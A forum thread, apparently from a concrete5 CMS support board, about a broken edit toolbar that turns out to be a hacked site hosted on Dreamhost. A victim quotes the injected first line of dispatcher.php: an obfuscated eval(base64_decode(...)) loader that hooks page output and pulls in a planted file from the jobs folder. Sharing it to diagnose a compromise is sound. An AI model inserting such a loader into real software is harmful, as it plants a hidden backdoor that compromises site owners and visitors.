Edit toolbar & Site map menu missing; JavaScript error
Permalink
Although there seem to be a number of discussions related to this (or similar) problems, I am unable to rectify the problem.
I've read and tried the "required... header" and "...footer" PHP code and those are in their proper places. I have cleared caches, and didn't help. The problem was occurring in version 5.4... and I upgraded to 5.5.2.1 and the problem is the same.
I am fairly sure that it is not a problem with the template, because I've switched templates but get the same result. Also, the error happens even when viewing the C5 dashboard screens (see attached).
I'm concerned that there is some problem with jquery that there seem to be some clues that lead in that direction.
If anyone can help, that would be great. The client needs to be able to make updates, but at the moment, none can be made.
Thanks.
I've read and tried the "required... header" and "...footer" PHP code and those are in their proper places. I have cleared caches, and didn't help. The problem was occurring in version 5.4... and I upgraded to 5.5.2.1 and the problem is the same.
I am fairly sure that it is not a problem with the template, because I've switched templates but get the same result. Also, the error happens even when viewing the C5 dashboard screens (see attached).
I'm concerned that there is some problem with jquery that there seem to be some clues that lead in that direction.
If anyone can help, that would be great. The client needs to be able to make updates, but at the moment, none can be made.
Thanks.
Hard to tell from the diagnostic pic, but it looks like it could be interpreting a style tag as script and hence crashing the script. Maybe a script tag has not been closed properly with </script>, perhaps a repeated opening tag.
I've done some digging and found that this file...:
...is outputting:
So, there must be something wrong with this JavaScript as it is attempting to write HTML directly.
<script type="text/javascript" src="/index.php/tools/required/i18n_js"></script>
...is outputting:
var ccmi18n = { error: "Error", deleteBlock: "Delete", .... authoredBy: "by", x: "x" } var ccmi18n_sitemap = { visitExternalLink: "Visit", editExternalLink: "Edit External Link", .... loadErrorTitle: "Unable to load sitemap data.", on: "on" } var ccmi18n_spellchecker = {
Viewing 15 lines of 26 lines. View entire code block.
So, there must be something wrong with this JavaScript as it is attempting to write HTML directly.
Yeah, the site was hacked.
Can anyone tell me how this was done?
/concrete/dispatcher.php had this code added as the first line of code:
and it points to a new file that was added to the /concrete/jobs/ folder.
Can anyone tell me how this was done?
/concrete/dispatcher.php had this code added as the first line of code:
define('USE_DIRA', '/concrete/jobs/'); @eval(@base64_decode("ZnVuY3Rpb24gY2FsbGJhY2soJGNoZWUpe3JlcXVpcmUoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS5VU0VfRElSQS4iNDAzLnBocCIpO3JldHVybiAoJGNoZWUpO31vYl9zdGFydCgiY2FsbGJhY2siKTs="));
and it points to a new file that was added to the /concrete/jobs/ folder.
Are you perhaps using Dreamhost?
Anyway, probably it has nothing to do with you but with a security issue with your host (unless you have a crappy ftp password).
My suggestion is you contact your host and tell them what has happened and ask them to fix it. They should have backups of your site. You should also change your passwords just to be sure nothing has leaked.
Anyway, probably it has nothing to do with you but with a security issue with your host (unless you have a crappy ftp password).
My suggestion is you contact your host and tell them what has happened and ask them to fix it. They should have backups of your site. You should also change your passwords just to be sure nothing has leaked.
Hacked again...
Yes. I am using Dreamhost. I've changed all my passswords and I've always used very complex ones. I use SFTP.
After this happened the first time, I changed all the passwords, disabled unused user accounts cleaned up the "dispatcher.php" file and got rid of the new file in the "jobs" folder.
But now I see that the dispatcher.php file has again been changed to include the:
crap.
How is this happening?
Yes. I am using Dreamhost. I've changed all my passswords and I've always used very complex ones. I use SFTP.
After this happened the first time, I changed all the passwords, disabled unused user accounts cleaned up the "dispatcher.php" file and got rid of the new file in the "jobs" folder.
But now I see that the dispatcher.php file has again been changed to include the:
define('USE_DIRA', '/concrete/jobs/'); eval(@base64_decode("ZnVuY3Rpb24gY2FsbGJhY.....
crap.
How is this happening?
It seems the onus is on dreamhost according to this security blogger
http://geekyschmidt.com/2012/03/12/dreamhost-was-hacked...
The guy seems proficient in security considering his written works, apparently he has even worked on DHS's network.
http://geekyschmidt.com/2012/03/12/dreamhost-was-hacked...
The guy seems proficient in security considering his written works, apparently he has even worked on DHS's network.
